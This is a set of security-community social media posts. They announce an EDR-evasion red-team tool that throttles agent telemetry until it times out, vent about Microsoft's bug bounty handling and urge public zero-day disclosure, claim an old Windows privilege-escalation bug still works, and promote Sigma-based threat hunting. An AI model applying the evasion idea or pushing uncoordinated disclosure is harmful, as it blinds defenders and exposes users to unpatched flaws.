New #redteam tool for blocking EDRs: EDRChoker
Instead of fully blocking the EDR agents' connections to their server, we can throttle their bandwidth so they consistently time out when sending data. This is effectively the same as blocking, but it avoids triggering "block" or "drop" packet events.
#pentest #cybersecurity
GitHub: TwoSevenOneT/EDRChoker
For a report I submitted to MSRC months ago, which showed full remote capabilities:
MSRC closed saying it's "Local only".
I comment: "I showed a 0 click proof of concept here. Why was it closed?"
MSRC: "The assessment decision remains unchanged."
Me: "Ok but I proved remote with X PoC and you can see the video I even attached a few months ago that shows it in action"
MSRC: "Please feel free to submit a new report with additional details."
Yeah, nah. Big L for Microslop. Nobody has a moral obligation to hand over their hard-earned discoveries for free. Pay up or shut up. You are owed nothing, and you will get nothing by stomping your feet like a petulant child because “[this is] an ‘unnecessary risk’ that forced its security teams to work around the clock, to understand, protect customers and develop patches.”
God forbid your people do their jobs and it costs you more money than paying the researcher. Good.
I suggest anyone either discloses them publicly to light a fire under Microsoft’s ass or keeps them to themselves. Make them feel the pain of not paying out appropriately to save them time. They have pulled the “doesn’t meet servicing criteria, then patch it in the next update” move one too many times for valid bugs.
RE:
https://t.co/prMIqJAkes
Microsoft "patched" a Windows bug in December 2020 that lets a standard user write to protected parts of the system that only SYSTEM should have access to. Basically you can take over the machine from a normal account.
I just built the new exploit for it and ran it on my Windows 11 machine. Still works. Over 5 years later.
Hunting Chinese APTs Abusing Native Windows Tools
We covered several ways Chinese APT groups abuse LOLBins based on findings from Mandiant reports. We also included Sigma rules and demonstrated how to convert them for use with your SIEM solution.
https://t.co/2Xbzdq1UHO
@three_cube @_aircorridor #dfir #apt
Big news for Blue Team nerds
That nerd who released those Microsoft 0days has created two new repos on GitHub with spooky sounding names indicating they will be releasing two new Windows 0days.
Very cool
https://t.co/VaWFtW5lFi